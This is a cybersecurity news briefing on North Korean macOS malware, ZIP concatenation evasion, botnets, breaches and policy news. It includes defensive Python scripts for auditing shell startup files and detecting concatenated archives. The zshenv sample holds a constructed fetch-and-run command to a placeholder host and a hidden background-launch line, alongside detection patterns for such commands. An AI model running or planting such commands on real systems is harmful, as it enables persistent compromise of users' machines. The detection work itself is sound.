Cyber Briefing: 2024.11.08
What are the latest cybersecurity alerts, incidents, and news?
North Korea, BlueNoroff, Crypto Firms, Hidden Risk Campaign, macOS Malware, ZIP Concatenation, Windows, Androxgh0st Botnet, Mozi, IoT, Earth Estries, Cybersecurity and Infrastructure Security Agency, Palo Alto Networks, Newpark Resources, Ransomware Attack, Universal Health Corporation, Symetra Life Insurance Company, OrthopedicsNY, Google News, India, Government Website, Gambling Promotion, European Union Agency for Cybersecurity (ENISA), NIS2, Risk Management, Australia, Social Media Ban, Youth Protection, Detroit, Cryptocurrency, Taxes, Roblox, Safety Enhancements, Kids, Social Spaces, Embed Security, Funding, AI Solutions, Overworked Analysts
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
North Korean cyber actors from the group BlueNoroff are targeting cryptocurrency firms with a macOS malware campaign, dubbed "Hidden Risk," that relies on social engineering and phishing. Discovered by SentinelOne, the campaign uses fake cryptocurrency news emails to lure targets into downloading a malicious application disguised as a PDF. Once executed, the app covertly installs a backdoor and persists through an unusual method: it writes to the user's ~/.zshenv file, which zsh sources on every invocation, interactive or not. Because no LaunchAgent or login item is registered, the implant is relaunched without the background-item notification that macOS would otherwise show the user.
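Because ~/.zshenv runs on every zsh start, auditing it is a cheap detection step. The script below is an added example, not SentinelOne's code or the campaign's actual zshenv content: it applies a handful of heuristics (network fetches, base64 decoding, detached background launches, execution from hidden home-directory paths or temp directories) to the zshenv files zsh reads, and returns the lines that match. The sample file contents, the pattern list and the `example.invalid` host are constructed for this example; a real ~/.zshenv will contain legitimate PATH exports, which the hidden-path rule deliberately does not flag.

```python
import re
from pathlib import Path

# Heuristics for lines that do not belong in a shell startup file. Constructed for this
# example: a starting point for triage, not a signature for any specific implant.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"(?:^|[\s;&|(])(?:curl|wget)\s"), "downloads content from the network"),
    (re.compile(r"base64\s+(?:-d|--decode|-D)\b"), "decodes an embedded base64 blob"),
    (re.compile(r"(?:\bnohup\s|\s&\s*$|\s&\s*;)"), "launches a detached background process"),
    # Only flag a hidden home-directory path when it is *executed* (line start, after a
    # separator, or after source/sh/bash/zsh/nohup), so PATH exports like $HOME/.cargo/bin pass.
    (re.compile(r'(?:^|[;&|(]\s*|\b(?:source|sh|bash|zsh|nohup)\s+)(?:"?\$HOME"?|~|/Users/[^/\s]+)/\.[^/\s]+'),
     "executes something from a hidden path in the home folder"),
    (re.compile(r"(?:^|\s)(?:/private)?/tmp/"), "runs or touches something in a temp directory"),
    (re.compile(r"\b(?:osascript|open\s+-a|launchctl)\b"), "drives macOS automation or launchd"),
]

# Constructed sample: two ordinary lines followed by two that a practitioner should look at.
SAMPLE_ZSHENV = """\
# constructed sample zshenv, not the real Hidden Risk file
export PATH="$HOME/.cargo/bin:$PATH"
export EDITOR=vim
if [ -x "$HOME/.Library/update" ]; then nohup "$HOME/.Library/update" >/dev/null 2>&1 & fi
curl -fsSL http://example.invalid/x -o /tmp/.x && sh /tmp/.x
"""


def suspicious_lines(text):
    """Return (line_number, line, reasons) for each non-comment line that matches a heuristic."""
    hits = []
    for num, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [why for pattern, why in SUSPICIOUS_PATTERNS if pattern.search(line)]
        if reasons:
            hits.append((num, line, "; ".join(reasons)))
    return hits


def audit_zshenv(paths=None):
    """Audit the zshenv files zsh sources on every start: system-wide ones first, then the user's.

    Returns {path: hits} for each file that exists; files that are absent are skipped.
    """
    if paths is None:
        paths = ["/etc/zshenv", "/etc/zsh/zshenv", Path.home() / ".zshenv"]
    report = {}
    for p in map(Path, paths):
        if p.is_file():
            report[str(p)] = suspicious_lines(p.read_text(errors="replace"))
    return report


if __name__ == "__main__":
    for num, line, reasons in suspicious_lines(SAMPLE_ZSHENV):
        print(f"sample line {num}: {reasons}\n    {line}")
    for path, hits in audit_zshenv().items():
        print(f"{path}: {len(hits)} suspicious line(s)")
```

Run it on a Mac and it reports against the real files; an empty report for ~/.zshenv is normal on a machine that never customised its shell, and any line that launches a hidden binary in the background deserves a closer look regardless of how it got there.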
Attackers are using a ZIP file concatenation evasion technique against Windows users: two or more complete ZIP archives are appended into a single file, with the malicious payload placed in a later archive. The trick works because every ZIP archive carries its own central directory and End of Central Directory record, and different readers disagree about which one to honor. 7-Zip parses the first archive and shows only its benign contents, hiding the payload, while WinRAR reads the last central directory and shows the second archive, which is where the payload sits; Windows File Explorer may fail to open the file at all. A security tool that parses the file the way 7-Zip does can therefore miss the payload that a user opening it in WinRAR will see and run.
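The parser disagreement is easy to reproduce. The Python below is an added example, not code from the report on this technique: it builds two small archives from constructed sample data, concatenates them, shows that Python's own `zipfile` module (which, like WinRAR, honours only the last End of Central Directory record) lists just the second archive, and then walks every EOCD record in the file to enumerate all embedded archives, which is the check a scanner needs so that the answer does not depend on which reader opens the file. The file names and contents are invented for the example; the `invoice.exe` entry is a few harmless bytes, not an executable.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # End of Central Directory record signature
CDIR_SIG = b"PK\x01\x02"   # central directory file header signature

# Constructed sample contents: a harmless first archive and a second one carrying the "payload".
BENIGN_FILES = {"readme.txt": b"quarterly figures attached\n"}
PAYLOAD_FILES = {"invoice.exe": b"MZ-not-a-real-executable\n"}


def build_zip(files):
    """Build an in-memory ZIP (stored, so the sample bytes stay predictable) from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def concatenated_sample():
    """Two complete archives appended back to back, as in the reported technique."""
    return build_zip(BENIGN_FILES) + build_zip(PAYLOAD_FILES)


def names_seen_by_zipfile(blob):
    """What a reader that honours only the *last* EOCD record reports (Python's zipfile does this)."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def list_all_archives(blob):
    """Walk every EOCD record in the blob and return one dict per embedded archive.

    Each dict holds the byte offset at which that archive starts and the entry names in
    its central directory. A single well-formed ZIP yields exactly one dict.
    """
    archives = []
    search_from = 0
    while (eocd := blob.find(EOCD_SIG, search_from)) != -1:
        search_from = eocd + 4
        if eocd + 22 > len(blob):
            break
        # EOCD layout: sig, disk no, CD disk, entries on disk, total entries, CD size, CD offset, comment len
        (_sig, _disk, _cd_disk, _n_on_disk, n_total,
         cd_size, cd_offset, _comment_len) = struct.unpack("<4sHHHHIIH", blob[eocd:eocd + 22])
        cd_start = eocd - cd_size            # the central directory ends where the EOCD begins
        if cd_start < 0 or blob[cd_start:cd_start + 4] != CDIR_SIG:
            continue                          # stray signature inside file data, not a real EOCD
        base = cd_start - cd_offset           # byte offset at which this embedded archive starts
        names, p = [], cd_start
        for _ in range(n_total):
            if blob[p:p + 4] != CDIR_SIG:
                break
            # 46-byte central directory header; fields 10..12 are name/extra/comment lengths
            hdr = struct.unpack("<4sHHHHHHIIIHHHHHII", blob[p:p + 46])
            name_len, extra_len, comment_len = hdr[10], hdr[11], hdr[12]
            names.append(blob[p + 46:p + 46 + name_len].decode("utf-8", "replace"))
            p += 46 + name_len + extra_len + comment_len
        archives.append({"offset": base, "names": names})
    return archives


def is_concatenated(blob):
    """True when more than one complete archive is embedded: treat such files as suspicious."""
    return len(list_all_archives(blob)) > 1


if __name__ == "__main__":
    sample = concatenated_sample()
    print("zipfile sees:", names_seen_by_zipfile(sample))
    for a in list_all_archives(sample):
        print(f"archive at offset {a['offset']}: {a['names']}")
    print("concatenated:", is_concatenated(sample))
```

The scanner locates each central directory from its EOCD record rather than trusting the stored offset, because after concatenation the second archive's offsets are still relative to its own start; a reader that trusts them blindly lands in the wrong place, which is one reason tools disagree on these files.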
The Androxgh0st botnet has evolved by integrating components from the Mozi botnet, expanding its reach to a wide range of IoT vulnerabilities. Observed exploiting web server vulnerabilities since January 2024, the botnet now deploys Mozi-linked payloads, allowing it to infect IoT devices such as routers and security cameras. It leverages vulnerabilities in well-known platforms, including Cisco ASA, Atlassian JIRA, Metabase, and Apache Web Server, among others.
Earth Estries, a sophisticated threat actor, continues to run prolonged intrusion campaigns using a diverse set of tactics, techniques, and procedures (TTPs). The group uses two distinct attack chains, gaining access through vulnerabilities in systems such as Microsoft Exchange and network adapter management tools. The first chain uses PsExec together with tools such as Cobalt Strike, Trillclient, Hemigate, and Crowdoor, delivered in CAB files. In the second chain, the group deploys malware such as Zingdoor and SnappyBee, typically fetched with cURL. Together these tools let Earth Estries maintain persistence, move laterally across networks, and steal credentials.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Palo Alto Networks' Expedition tool to its Known Exploited Vulnerabilities (KEV) catalog, following evidence of active exploitation. Tracked as CVE-2024-5910, the flaw is a missing-authentication issue in Expedition, the firewall configuration migration tool, that allows an attacker with network access to the Expedition host to take over the admin account and read the sensitive data the tool holds, such as credentials and configuration secrets.
Newpark Resources, a Texas-based supplier of fluid systems and industrial solutions to the oil and gas industry, has reported a ransomware attack that disrupted its operations. In a filing with the U.S. Securities and Exchange Commission, the company revealed that it detected the incident on October 29, 2024, when an unauthorized third party accessed its internal systems. Following detection, Newpark initiated its cybersecurity response plan and launched an internal investigation with external support to assess and contain the threat.
On or around July 29, 2024, Universal Health Corporation (UHC) detected unauthorized access to certain employee email accounts, leading to a potential breach of Protected Health Information (PHI). After taking immediate action, including password resets and engaging forensic experts, UHC confirmed on September 24, 2024, that an unauthorized third party may have accessed sensitive information, including personal and medical details such as names, Social Security numbers, medical records, and health insurance information.
In November 2024, Symetra Life Insurance Company reported a data breach involving unauthorized access to certain customer accounts. Between April 12 and September 10, 2024, an external party used personal information it already held to log into customer accounts, exposing sensitive data such as names, addresses, email addresses, dates of birth, account numbers, and beneficiary details. Upon discovering the breach, Symetra stopped the unauthorized access and launched an investigation to determine the extent of the compromise.
OrthopedicsNY, LLP recently disclosed a data breach impacting sensitive patient information. The breach, which was discovered in December 2023, allowed an unauthorized party to access confidential data, including names, Social Security numbers, health insurance details, and protected health information. Following the breach, OrthopedicsNY secured its systems and launched an investigation to determine the extent of the compromise. The company filed an official notice with the Texas Attorney General on November 6, 2024, and began sending out notification letters to affected individuals.
On November 8, 2024, Google News was spammed with promotional links originating from a hacked Telangana government website, that of the Hyderabad Metropolitan Water Supply and Sewerage Board in India. The site, which Hyderabad residents use to pay their water bills, had a SQL injection flaw that the attackers exploited to plant content redirecting visitors to gambling and betting sites. The planted links were picked up by Google News and gained traction there, particularly under the technology section's latest news tab.
Cyber News
The European Union Agency for Cybersecurity (ENISA) has released new technical guidance to help EU Member States and entities effectively implement the cybersecurity risk management requirements outlined in the NIS2 Directive. This guidance supports the European Commission's goal of achieving a high level of cybersecurity across the EU by strengthening the resilience of critical sectors. Developed in collaboration with various cybersecurity groups, the guidance includes actionable advice on risk assessment, incident handling, business continuity, and supply chain security.
Australian Prime Minister Anthony Albanese has announced a groundbreaking initiative to ban social media use for individuals under 16 years old, citing concerns over online bullying, peer pressure, scams, and sexual harassment. The legislation, expected to be introduced by the end of 2024, will place the responsibility for enforcing the ban on the social media platforms, with oversight from the eSafety Commissioner. Users under 16 will not themselves face penalties, and neither an existing account nor parental consent will exempt a child from the ban.
Detroit is set to become one of the first major U.S. cities to accept cryptocurrency for tax payments and other city services starting in mid-2025. The city's Office of Treasury announced that payments will be processed through a secure platform managed by PayPal, which currently supports major cryptocurrencies like Bitcoin, Ethereum, Litecoin, and Bitcoin Cash. The move is part of Detroit's broader efforts to modernize its payment systems and attract blockchain innovation.
Roblox has introduced new safety measures aimed at protecting younger users by restricting access to certain experiences on its platform. Starting in 2025, users under the age of 13 will be prohibited from engaging in unrated experiences, social hangouts, and games that allow free-form 2D user creation. These changes are in response to concerns about online safety risks such as inappropriate language, grooming, and explicit content. Creators must complete a questionnaire to ensure their experiences meet safety standards before being accessible to younger players.
Embed Security, a cybersecurity startup founded in 2024 by former leaders from Meta, Google, FireEye, and Mandiant, has raised $6 million in an early-stage funding round led by Paladin Capital Group. The company offers an AI-driven security platform designed to relieve overburdened security analysts by autonomously investigating alerts, detecting threats, and providing guidance. The platform triages and prioritizes threats across the security stack, allowing analysts to focus on higher-value tasks such as remediation and threat hunting.
Copyright © 2024 CyberMaterial. All Rights Reserved.